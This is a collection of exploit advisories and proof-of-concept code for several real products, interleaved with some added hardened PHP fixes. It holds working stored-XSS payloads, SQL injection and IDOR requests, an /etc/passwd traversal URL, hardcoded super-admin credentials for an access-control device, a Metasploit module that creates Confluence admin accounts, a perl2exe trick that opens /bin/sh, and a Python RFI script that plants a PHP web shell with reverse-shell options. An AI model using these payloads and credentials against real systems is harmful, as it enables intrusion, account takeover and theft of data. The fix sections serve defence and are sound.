<pre><code># Exploit Title: WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - "Dashboard Redirect" field Stored Cross-Site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 28/10/2023<br /># Exploit Author: Rachit Arora<br /># Vendor Homepage: <br /># Software Link: https://wordpress.org/plugins/admin-bar-dashboard-control/<br /># Version: 1.2.8<br /># Category: Web Application<br /># Tested on: Windows<br /># CVE : 2023-47184<br /><br /><br />1. Install WordPress (latest).<br /><br />2. Install and activate Admin Bar & Dashboard Access Control.<br /><br />3. Navigate to "Admin Bar & Dash" >> Dashboard Access and enter one of the following payloads into the "Dashboard Redirect" input field:<br /><br />"onfocusin=alert``+autofocus><br />"onfocusin=alert`document.domain`+autofocus><br /><br />4. The payload is stored as entered. Whenever the same functionality is triggered again, the stored JavaScript executes and an alert pop-up appears.<br /><br /></code></pre>
<pre><code># Exploit Title: Hospital Management System - IDOR + Account Takeover<br /># Google Dork: N/A<br /># Application: Hospital Management System<br /># Date: 27.02.2024<br /># Bugs: IDOR + Account Takeover<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver<br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />This report covers two vulnerabilities, Insecure Direct Object Reference (IDOR) and Account Takeover. Both stem from inadequate validation of user input and of the caller's access privileges.<br /><br /><br />## Proof of Concept (PoC):<br /><br />Target User Information:<br /><br />User 1:<br />ID: 1<br />Email: patient@patient.com<br />Password: patient<br />-----------------------------------<br />User 2:<br />ID: 4<br />Email: attack@ker<br />Password: q1w2e3<br />-----------------------------------<br /><br /><br />User 1 Request<br /><br />POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1<br />Host: localhost<br />Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=f6je8gcsm0h685mfr2g37ot8to<br />...<br />id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=Mrs.Sunita+Dighe&nic=422201&Tele=9090909091&address=India&password=patient&cpassword=patient<br /><br /><br />User 2 Request<br /><br />POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1<br />Host: localhost<br />Cookie: PHPSESSID=4c8per12a8freilu1upich92a4<br />...<br />id00=4&oldemail=attack%40ker&email=attack%40ker&name=attack+attacker&nic=123123123&Tele=0712345677&address=attac&password=q1w2e3&cpassword=q1w2e3<br /><br /><br /><br />Attacker's Request<br /><br />The attacker aims to modify the account details of "patient 1" and, still using User 2's session cookie, sends the following HTTP request:<br /><br />POST /Vaidya%20Mitra/vm/patient/edit-user.php HTTP/1.1<br />Host: localhost<br />Cookie: PHPSESSID=4c8per12a8freilu1upich92a4<br />...<br />id00=1&oldemail=patient%40patient.com&email=patient%40patient.com&name=MRRS.Sunita+Dighe&nic=422201&Tele=9090909091&address=attac&password=q1w2e3&cpassword=q1w2e3<br /><br /><br />In the SQL queries shown in the vulnerable code section below, the $id value received from the user is inserted directly into the query and no authorization check is performed, so another user's record can be modified. Moreover, because the user's identity is taken from the POST data (id00), the attacker can simply submit another user's id as his own.<br /><br /><br />PoC video: https://www.youtube.com/watch?v=pmoBSnu9IYI<br /><br /><br /><br />## Vulnerable code section:<br />====================================================<br /><br />$sql1="update patient set pemail='$email',pname='$name',ppassword='$password',pnic='$nic',ptel='$tele',paddress='$address' where pid=$id ;";<br />$database->query($sql1);<br />echo $sql1;<br />$sql1="update webuser set email='$email' where email='$oldemail' ;";<br />$database->query($sql1);<br />echo $sql1;<br />====================================================<br /><br /><br />## Risks:<br /><br />This security vulnerability exposes user information to unauthorized access and modification. The resulting risks include account takeover, privacy breaches and non-compliance with security policies, any of which can cause substantial damage to the system.<br /></code></pre>
<pre><code># Exploit Title: Hospital Management System - SQL Injection<br /># Google Dork: N/A<br /># Application: Hospital Management System<br /># Date: 26.02.2024<br /># Bugs: SQL Injection<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver<br /># CVE : N/A<br /><br /><br />## Vulnerability Description:<br /><br />A security vulnerability has been identified in this web application: user-supplied data is placed directly into SQL queries, making the application susceptible to SQL injection. This may enable malicious actors to gain unauthorized access to sensitive information.<br /><br /><br />## Proof of Concept (PoC):<br /><br />Below is an example of a request a malicious actor could send to exploit this vulnerability.<br /><br />POST /Vaidya%20Mitra/vm/login.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 80<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/Vaidya%20Mitra/vm/login.php<br />Cookie: _ga=GA1.1.2080672900.1708952048; _gid=GA1.1.1833914840.1708952048; PHPSESSID=18a16tga7k2glh7<br /><br />useremail=test@123.asd'%2b(select*from(select(sleep(5)))a)%2b'&userpassword=test<br /><br /><br />In this example, the payload appended to the useremail parameter calls the MySQL sleep() function, intentionally delaying the server's response by five seconds; the delay confirms that the injected expression was evaluated by the database. Real-world attacks could involve more damaging operations.<br /><br /><br />Request/response screenshot: https://i.imgur.com/LxENLBz.png<br /><br /><br />## Vulnerable code section:<br />====================================================<br />/Vaidya%20Mitra/vm/login.php<br /><br />$email = $_POST['useremail'];<br />$password = $_POST['userpassword'];<br /><br />$result = $database->query("select * from webuser where email='$email'");<br />====================================================<br /><br /></code></pre>
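A hardened version of the two query sites from this advisory and the IDOR/Account Takeover advisory above (edit-user.php and login.php), as an added example that is not the Hospital Management System's own code. It assumes a PDO connection in `$pdo` with exceptions enabled, that login stores the patient's `pid` in `$_SESSION['pid']`, that `patient.ppassword` holds a `password_hash()` value instead of the plaintext the original stores, and that the edit form sends a `current_password` field; the login lookup is shown against the patient table for brevity. Table and column names are the ones visible in the advisories.

```php
<?php
// Added example, not the Hospital Management System's own code.
// Assumptions: $pdo is a PDO connection (ERRMODE_EXCEPTION); login() stores the
// patient's pid in $_SESSION['pid']; patient.ppassword holds a password_hash() value.
session_start();

// edit-user.php: the row to update is chosen by the server-side session, not by the
// id00 field of the POST body, so a logged-in user can only ever edit their own row.
function current_patient_id(): int
{
    if (empty($_SESSION['pid'])) {
        http_response_code(401);
        exit('Not logged in');
    }
    return (int) $_SESSION['pid'];
}

function update_patient(PDO $pdo, int $pid, array $in): void
{
    $email = filter_var($in['email'] ?? '', FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        throw new InvalidArgumentException('invalid e-mail');
    }
    $pdo->beginTransaction();
    // The previous e-mail is read back by pid instead of trusting oldemail from the
    // POST body, so the webuser row of a different account cannot be re-pointed.
    $stmt = $pdo->prepare('SELECT pemail FROM patient WHERE pid = :pid');
    $stmt->execute([':pid' => $pid]);
    $oldEmail = (string) $stmt->fetchColumn();
    // Every value is bound as a parameter; nothing is concatenated into the SQL text.
    $stmt = $pdo->prepare('UPDATE patient SET pemail = :email, pname = :name, pnic = :nic, '
        . 'ptel = :tel, paddress = :address WHERE pid = :pid');
    $stmt->execute([
        ':email' => $email, ':name' => $in['name'] ?? '', ':nic' => $in['nic'] ?? '',
        ':tel' => $in['Tele'] ?? '', ':address' => $in['address'] ?? '', ':pid' => $pid,
    ]);
    $stmt = $pdo->prepare('UPDATE webuser SET email = :new WHERE email = :old');
    $stmt->execute([':new' => $email, ':old' => $oldEmail]);
    $pdo->commit();
}

// Changing the password re-checks the current one, so a leaked session cookie or a
// CSRF request cannot silently lock the real owner out (the takeover shown above).
function change_password(PDO $pdo, int $pid, string $current, string $new, string $confirm): bool
{
    if ($new !== $confirm || strlen($new) < 12) {
        return false;
    }
    $stmt = $pdo->prepare('SELECT ppassword FROM patient WHERE pid = :pid');
    $stmt->execute([':pid' => $pid]);
    $hash = $stmt->fetchColumn();
    if ($hash === false || !password_verify($current, $hash)) {
        return false;
    }
    $stmt = $pdo->prepare('UPDATE patient SET ppassword = :hash WHERE pid = :pid');
    $stmt->execute([':hash' => password_hash($new, PASSWORD_DEFAULT), ':pid' => $pid]);
    return true;
}

// login.php: the e-mail is a bound parameter, so the sleep() payload from the SQL
// injection advisory is compared as a literal string value and never executed.
function login(PDO $pdo, string $email, string $password): ?int
{
    $stmt = $pdo->prepare('SELECT pid, ppassword FROM patient WHERE pemail = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['ppassword'])) {
        return null; // same answer for unknown e-mail and wrong password
    }
    session_regenerate_id(true);
    $_SESSION['pid'] = (int) $row['pid'];
    return (int) $row['pid'];
}
```

In edit-user.php the entry point becomes `update_patient($pdo, current_patient_id(), $_POST)`, with `change_password()` called only when a new password was submitted.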
<pre><code># Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution<br /># Date: 10/17/2023<br /># Exploit Author: decrazyo<br /># Vendor Homepage: https://www.indigostar.com/<br /># Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz<br /># Version: <= V30.10C<br /># Tested on: Ubuntu 22.04<br /><br /># Description:<br />perl2exe packs perl scripts into native executables.<br />Those executables use their 0th argument (argv[0]) to locate the file to unpack and execute.<br />Because of that, such an executable can be made to unpack and execute a different perl2exe-compiled executable by controlling its 0th argument.<br />That can be useful for breaking out of restricted shell environments.<br /><br /># Proof of Concept:<br />user@testing:~/example$ ls<br />p2x-30.10-Linux-x64-5.30.1.tar.gz perl2exe-Linux-x64-5.30.1<br />user@testing:~/example$ <br />user@testing:~/example$ # Create and pack a "safe" perl script to target with the attack.<br />user@testing:~/example$ echo 'print("I am completely safe\n");' > safe.pl<br />user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe safe.pl<br />Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software<br />...<br />Generating safe<br />user@testing:~/example$ <br />user@testing:~/example$ # Check that the program executes as expected.<br />user@testing:~/example$ ./safe<br />I am completely safe<br />user@testing:~/example$ <br />user@testing:~/example$ # Create and pack a "malicious" script that we want to execute.<br />user@testing:~/example$ echo 'print("j/k I am malicious AF\n");system("/bin/sh");' > malicious.pl<br />user@testing:~/example$ ./perl2exe-Linux-x64-5.30.1/perl2exe malicious.pl<br />Perl2Exe V30.10C 2020-12-11 Copyright (c) 1997-2020 IndigoSTAR Software<br />...<br />Generating malicious<br />user@testing:~/example$ <br />user@testing:~/example$ # Our "malicious" file doesn't need to have execution permissions.<br />user@testing:~/example$ chmod -x malicious<br />user@testing:~/example$ ./malicious<br />-bash: ./malicious: Permission denied<br />user@testing:~/example$ <br />user@testing:~/example$ # Execute the "safe" program with the name of the "malicious" program as the 0th argument.<br />user@testing:~/example$ # The "safe" program will unpack and execute the "malicious" program instead of itself.<br />user@testing:~/example$ bash -c 'exec -a malicious ./safe'<br />j/k I am malicious AF<br />$ pstree -s $$<br />systemd───sshd───sshd───sshd───bash───safe───sh───pstree<br />$<br /><br /></code></pre>
<pre><code># Exploit Title: Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin<br /># Google Dork: <br /># Date: 12/9/2023<br /># Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure<br /># Vendor Homepage: http://automatic-systems.com<br /># Software Link: <br /># Version: V06<br /># Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a<br /># CVE : CVE-2023-37608<br /><br />An issue in Automatic Systems SOC FL9600 FastLine version V06 allows a remote attacker to obtain sensitive information via the admin login credentials.<br /><br />The device contains a hardcoded login and password for the super admin account. The administrator cannot change the password for this account.<br /><br />Login: automaticsystems<br />Password: astech<br /><br /></code></pre>
<pre><code># Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Traversal<br /># Google Dork: <br /># Date: 12/9/2023<br /># Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure<br /># Vendor Homepage: http://automatic-systems.com<br /># Software Link: <br /># Version: V06<br /># Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a<br /># CVE : CVE-2023-37607<br /><br />Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /><br />  prepend Msf::Exploit::Remote::AutoCheck<br />  include Msf::Exploit::Remote::HttpClient<br /><br />  def initialize(info = {})<br />    super(<br />      update_info(<br />        info,<br />        'Name' => 'Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control',<br />        'Description' => %q{<br />          This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.<br />          A specially crafted request can create a new admin account without authentication on the target Atlassian server.<br />        },<br />        'Author' => [<br />          'Unknown', # exploited in the wild<br />          'Emir Polat' # metasploit module<br />        ],<br />        'References' => [<br />          ['CVE', '2023-22515'],<br />          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],<br />          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-22515'],<br />          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis']<br />        ],<br />        'DisclosureDate' => '2023-10-04',<br />        'DefaultOptions' => {<br />          'RPORT' => 8090<br />        },<br />        'License' => MSF_LICENSE,<br />        'Notes' => {<br />          'Stability' => [CRASH_SAFE],<br />          'Reliability' => [REPEATABLE_SESSION],<br />          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]<br />        }<br />      )<br />    )<br /><br />    register_options([<br />      OptString.new('TARGETURI', [true, 'Base path', '/']),<br />      OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/),<br />      OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]),<br />      OptString.new('NEW_EMAIL', [true, 'E-mail to be used when creating a new user with admin privileges', Faker::Internet.email])<br />    ])<br />  end<br /><br />  def check<br />    res = send_request_cgi(<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, '/login.action')<br />    )<br />    return Exploit::CheckCode::Unknown unless res<br />    return Exploit::CheckCode::Safe unless res.code == 200<br /><br />    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text<br />    return Exploit::CheckCode::Safe unless poweredby =~ /Confluence (\d+(\.\d+)*)/<br /><br />    confluence_version = Rex::Version.new(Regexp.last_match(1))<br /><br />    vprint_status("Detected Confluence version: #{confluence_version}")<br /><br />    if confluence_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.3.2')) ||<br />       confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.2')) ||<br />       confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.1'))<br />      return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}")<br />    end<br /><br />    Exploit::CheckCode::Safe("Confluence version: #{confluence_version}")<br />  end<br /><br />  def run<br />    res = send_request_cgi(<br />      'method' => 'GET',<br />      'uri' => normalize_uri(target_uri.path, '/server-info.action'),<br />      'vars_get' => {<br />        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'<br />      }<br />    )<br /><br />    return fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Version vulnerable but setup is already completed') unless res&.code == 302 || res&.code == 200<br /><br />    print_good('Found server-info.action! Trying to ignore setup.')<br /><br />    created_user = create_admin_user<br /><br />    res = send_request_cgi(<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, 'setup/finishsetup.action'),<br />      'headers' => {<br />        'X-Atlassian-Token' => 'no-check'<br />      }<br />    )<br /><br />    return fail_with(Msf::Exploit::Failure::NoAccess, 'The admin user could not be created. Try a different username.') unless created_user<br /><br />    print_warning('Admin user was created but setup could not be completed.') unless res&.code == 200<br /><br />    create_credential({<br />      workspace_id: myworkspace_id,<br />      origin_type: :service,<br />      module_fullname: fullname,<br />      username: datastore['NEW_USERNAME'],<br />      private_type: :password,<br />      private_data: datastore['NEW_PASSWORD'],<br />      service_name: 'Atlassian Confluence',<br />      address: datastore['RHOST'],<br />      port: datastore['RPORT'],<br />      protocol: 'tcp',<br />      status: Metasploit::Model::Login::Status::UNTRIED<br />    })<br /><br />    print_good("Admin user was created successfully. Credentials: #{datastore['NEW_USERNAME']} - #{datastore['NEW_PASSWORD']}")<br />    print_good("Now you can login as administrator from: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}login.action")<br />  end<br /><br />  def create_admin_user<br />    res = send_request_cgi(<br />      'method' => 'POST',<br />      'uri' => normalize_uri(target_uri.path, 'setup/setupadministrator.action'),<br />      'headers' => {<br />        'X-Atlassian-Token' => 'no-check'<br />      },<br />      'vars_post' => {<br />        'username' => datastore['NEW_USERNAME'],<br />        'fullName' => 'New Admin',<br />        'email' => datastore['NEW_EMAIL'],<br />        'password' => datastore['NEW_PASSWORD'],<br />        'confirm' => datastore['NEW_PASSWORD'],<br />        'setup-next-button' => 'Next'<br />      }<br />    )<br />    res&.code == 302<br />  end<br />end<br /></code></pre>
<pre><code># Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)<br /># Date: 20/10/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://moodle.org/<br /># Software Demo: https://school.moodledemo.net/<br /># Version: 4.3+<br /># Tested on: Linux<br /><br /><br />Vulnerability Details<br />======================<br /><br />Steps:<br /><br />1. Log in to the application with the given credentials > USER: teacher PASS: moodle<br />2. Open profile.php?id=11 and modify the id parameter to view another user's details: email address, country, city/town, timezone<br />3. Change the existing "id" value to another number, for example:<br /><br />https://school.moodledemo.net/user/profile.php?id=4<br />https://school.moodledemo.net/user/profile.php?id=5<br />https://school.moodledemo.net/user/profile.php?id=10<br />https://school.moodledemo.net/user/profile.php?id=50<br /><br />https://school.moodledemo.net/blog/index.php?userid=3<br />https://school.moodledemo.net/blog/index.php?userid=14<br /><br />https://school.moodledemo.net/mod/forum/user.php?id=53<br />https://school.moodledemo.net/mod/forum/user.php?id=50<br /><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE)<br /># Date: 04/11/2023<br /># Exploit Author: Leopoldo Angulo (leoanggal1)<br /># Vendor Homepage: https://wordpress.org/plugins/canto/<br /># Software Link: https://downloads.wordpress.org/plugin/canto.3.0.4.zip<br /># Version: All versions of Canto Plugin prior to 3.0.5<br /># Tested on: Ubuntu 22.04, WordPress 6.3.2, Canto Plugin 3.0.4<br /># CVE : CVE-2023-3452<br /><br /># PoC Notes:<br /># The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. (Reference: https://nvd.nist.gov/vuln/detail/CVE-2023-3452)<br /># This code exploits the improper handling of the wp_abspath variable in the following line of the "download.php" code:<br /># ... require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php'); ...<br /># This is just an example; the same misconfiguration exists in other lines of the vulnerable plugin files.<br /># More information in Leoanggal1's Github<br /><br />#!/usr/bin/python3<br />import argparse<br />import http.server<br />import socketserver<br />import threading<br />import requests<br />import os<br />import subprocess<br /><br /># Define the default web shell<br />default_web_shell = "<?php system($_GET['cmd']); ?>"<br /><br />def create_admin_file(local_dir, local_shell=None):<br />    if not os.path.exists(local_dir):<br />        os.makedirs(local_dir)<br /><br />    # If a local shell is provided, use it; otherwise, use the default web shell<br />    if local_shell:<br />        with open(f"{local_dir}/admin.php", "wb") as admin_file:<br />            with open(local_shell, "rb") as original_file:<br />                admin_file.write(original_file.read())<br />    else:<br />        with open(f"{local_dir}/admin.php", "w") as admin_file:<br />            admin_file.write(default_web_shell)<br /><br />def start_local_server(local_port):<br />    # Create the server here and hand it back so the caller can stop it later;<br />    # serve_forever() itself runs in a background thread inside exploit_rfi()<br />    Handler = http.server.SimpleHTTPRequestHandler<br />    socketserver.TCPServer.allow_reuse_address = True<br />    httpd = socketserver.TCPServer(("0.0.0.0", local_port), Handler)<br /><br />    print(f"Local web server on port {local_port}...")<br />    return httpd<br /><br />def exploit_rfi(url, local_shell, local_host, local_port, command, nc_port):<br />    local_dir = "wp-admin"<br />    create_admin_file(local_dir, local_shell)<br /><br />    target_url = f"{url}/wp-content/plugins/canto/includes/lib/download.php"<br />    local_server = f"http://{local_host}:{local_port}"<br />    command = f"cmd={command}"<br /><br />    if local_shell and nc_port:<br />        # If a local shell and a listener port are provided, start netcat on that port<br />        subprocess.Popen(["nc", "-lvp", str(nc_port)])<br /><br />    httpd = start_local_server(local_port)<br />    server_thread = threading.Thread(target=httpd.serve_forever)<br />    server_thread.daemon = True<br />    server_thread.start()<br /><br />    exploit_url = f"{target_url}?wp_abspath={local_server}&{command}"<br />    print(f"Exploitation URL: {exploit_url}")<br /><br />    response = requests.get(exploit_url)<br />    print("Server response:")<br />    print(response.text)<br /><br />    # Shut down the local web server: shutdown() makes serve_forever() return, then the thread can be joined<br />    print("Shutting down local web server...")<br />    httpd.shutdown()<br />    httpd.server_close()<br />    server_thread.join()<br /><br />if __name__ == "__main__":<br />    examples = '''<br />    Examples:<br />    - Check the vulnerability<br />    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33<br /><br />    - Execute a command<br />    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'<br /><br />    - Upload and run a reverse shell file. You can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php or generate it with msfvenom.<br />    python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -s php-reverse-shell.php<br />    '''<br />    parser = argparse.ArgumentParser(description="Script to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress - CVE-2023-3452", epilog=examples, formatter_class=argparse.RawDescriptionHelpFormatter)<br />    parser.add_argument("-u", "--url", required=True, default=None, help="Vulnerable URL")<br />    parser.add_argument("-s", "--shell", help="Local file for web shell")<br />    parser.add_argument("-LHOST", "--local_host", required=True, help="Local web server IP")<br />    parser.add_argument("-LPORT", "--local_port", help="Local web server port")<br />    parser.add_argument("-c", "--command", default="whoami", help="Command to execute on the target")<br />    parser.add_argument("-NC_PORT", "--nc_port", type=int, help="Listener port for netcat")<br /><br />    try:<br />        args = parser.parse_args()<br /><br />        if args.local_port is None:<br />            args.local_port = 8080  # Default value if LPORT is not provided<br />        exploit_rfi(args.url, args.shell, args.local_host, int(args.local_port), args.command, args.nc_port)<br /><br />    except SystemExit:<br />        parser.print_help()<br /><br /></code></pre>
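For contrast, the hardened form of the include this PoC abuses, as an added example written here and not taken from the Canto plugin: the WordPress root is derived from the plugin file's own location on disk and verified, and the request parameter is never consulted. The directory depth assumes the default `wp-content/plugins/canto/includes/lib/` layout, loading `wp-load.php` in place of `wp-admin/admin.php` is a simplification, and the function name is made up.

```php
<?php
// Added example, not the Canto plugin's own code. Replaces the vulnerable line
//   require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');
// quoted in the advisory. Assumes the default plugin layout
//   <root>/wp-content/plugins/canto/includes/lib/download.php
// so that five dirname() steps up from this directory reach the install root.

function canto_safe_wp_root(): string
{
    // Walk up from this file to the install root; the request is never consulted.
    $root = realpath(dirname(__DIR__, 5));
    // Accept only a real, local WordPress root. realpath() returns false for
    // stream wrappers such as http:// and php://, which is exactly what turned the
    // original include into an RFI whenever allow_url_include was enabled.
    if ($root === false || !is_file($root . '/wp-load.php')) {
        http_response_code(500);
        exit('WordPress root not found');
    }
    return $root;
}

// Observability: a request that still carries wp_abspath is an exploitation attempt
// against the old code path and is worth logging even though the value is ignored.
if (isset($_REQUEST['wp_abspath'])) {
    error_log('canto: ignored wp_abspath=' . substr((string) $_REQUEST['wp_abspath'], 0, 200)
        . ' from ' . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
}

require_once canto_safe_wp_root() . '/wp-load.php';
```

Setting `allow_url_include=Off` in php.ini (it has been off by default for years) is the defence in depth that makes the original line fail closed even before the plugin is patched.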
<pre><code># Exploit Title: POC-CVE-2023-3244<br /># Date: 9/12/2023<br /># Exploit Author: Diaa Hanna<br /># Software Link: [download link if available]<br /># Version: <= 1.2.0 comments-like-dislike<br /># Tested on: 1.1.6 comments-like-dislike<br /># CVE : CVE-2023-3244<br /><br /># References<br /># https://nvd.nist.gov/vuln/detail/CVE-2023-3244<br /><br /><br /># The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin.<br /># This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users.<br /># For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244).<br /><br />import requests<br />import argparse<br />import sys<br />from colorama import Fore<br /><br />parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244', description='This is a proof of concept for CVE-2023-3244, an access control vulnerability in the restore_settings function')<br />parser.add_argument('-u', '--username', help='username of a user on wordpress with low privileges', required=True)<br />parser.add_argument('-p', '--password', help='password of a user on wordpress with low privileges', required=True)<br />parser.add_argument('--url', help='the url of the vulnerable server (with http or https)', required=True)<br />parser.add_argument('--nossl', help='disable ssl verification', action='store_true', required=False, default=False)<br />args = parser.parse_args()<br /><br /># check if the url ends with a '/'; if not, add it<br />url = args.url<br />if url[-1] != '/':<br />    url += '/'<br /><br />wp_login = f'{url}wp-login.php'<br />wp_admin = f'{url}wp-admin/'<br />username = args.username<br />password = args.password<br /><br />session = requests.Session()<br /># logging in<br />session.post(wp_login, headers={'Cookie': 'wordpress_test_cookie=WP Cookie check'},<br />             data={'log': username, 'pwd': password, 'wp-submit': 'Log In',<br />                   'redirect_to': wp_admin, 'testcookie': '1'}, verify=not args.nossl)<br /># if failed to login<br />if len(session.cookies.get_dict()) == 2:<br />    print(Fore.RED + "Error logging in. Check your username and password and try again")<br />    sys.exit(1)<br /><br /># making the ajax request to wp_ajax_cld_settings_restore_action; this line will call the restore_settings function<br /># the restore_settings function does not check whether the logged-in user has sufficient privileges,<br /># so even a subscriber can use this POC<br />response = session.get(f"{wp_admin}admin-ajax.php?action=cld_settings_restore_action", verify=not args.nossl)<br /><br />if response.text == "Settings restored successfully.Redirecting...":<br />    print(Fore.GREEN + "exploit executed successfully")<br />    print(Fore.YELLOW + "settings of the comments-like-dislike plugin should be defaulted on the server")<br />    sys.exit(0)<br />else:<br />    print(Fore.RED + "some error occurred; please read the source code of the poc, it isn't that long anyway")<br />    sys.exit(1)<br /><br /></code></pre>
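The fix on the plugin side, as an added example written here rather than taken from the Comments Like Dislike plugin: the AJAX handler needs a capability check, because a nonce alone (the partial fix in 1.2.0 mentioned above) proves only where the request was rendered, not who is allowed to make it. The AJAX action name `cld_settings_restore_action` comes from the PoC; the option name, the nonce action and the function names are assumed.

```php
<?php
// Added example, not the Comments Like Dislike plugin's own code.
// Assumed names: the 'cld_settings' option, the 'cld_restore' nonce action and both
// function names. The AJAX action name is the one the PoC above requests.

// Hardened handler. wp_ajax_* hooks fire for every logged-in account, subscribers
// included, so the hook itself grants no authorization.
function cld_settings_restore_hardened()
{
    // 1. CSRF protection. A nonce is bound to the user who rendered it, but if the
    //    settings page (and so the nonce) is visible to subscribers they can simply
    //    read it, which is the 1.2.0 situation the advisory describes.
    check_ajax_referer('cld_restore', 'nonce');

    // 2. Authorization. This is the check restore_settings was missing.
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Insufficient permissions'], 403);
    }

    delete_option('cld_settings');
    wp_send_json_success(['message' => 'Settings restored']);
}
add_action('wp_ajax_cld_settings_restore_action', 'cld_settings_restore_hardened');

// Hand out the nonce-bearing URL only to accounts that pass the same capability
// test, so low-privilege users never obtain a valid nonce in the first place.
function cld_restore_url(): ?string
{
    if (!current_user_can('manage_options')) {
        return null;
    }
    return wp_nonce_url(
        admin_url('admin-ajax.php?action=cld_settings_restore_action'),
        'cld_restore',
        'nonce'
    );
}
```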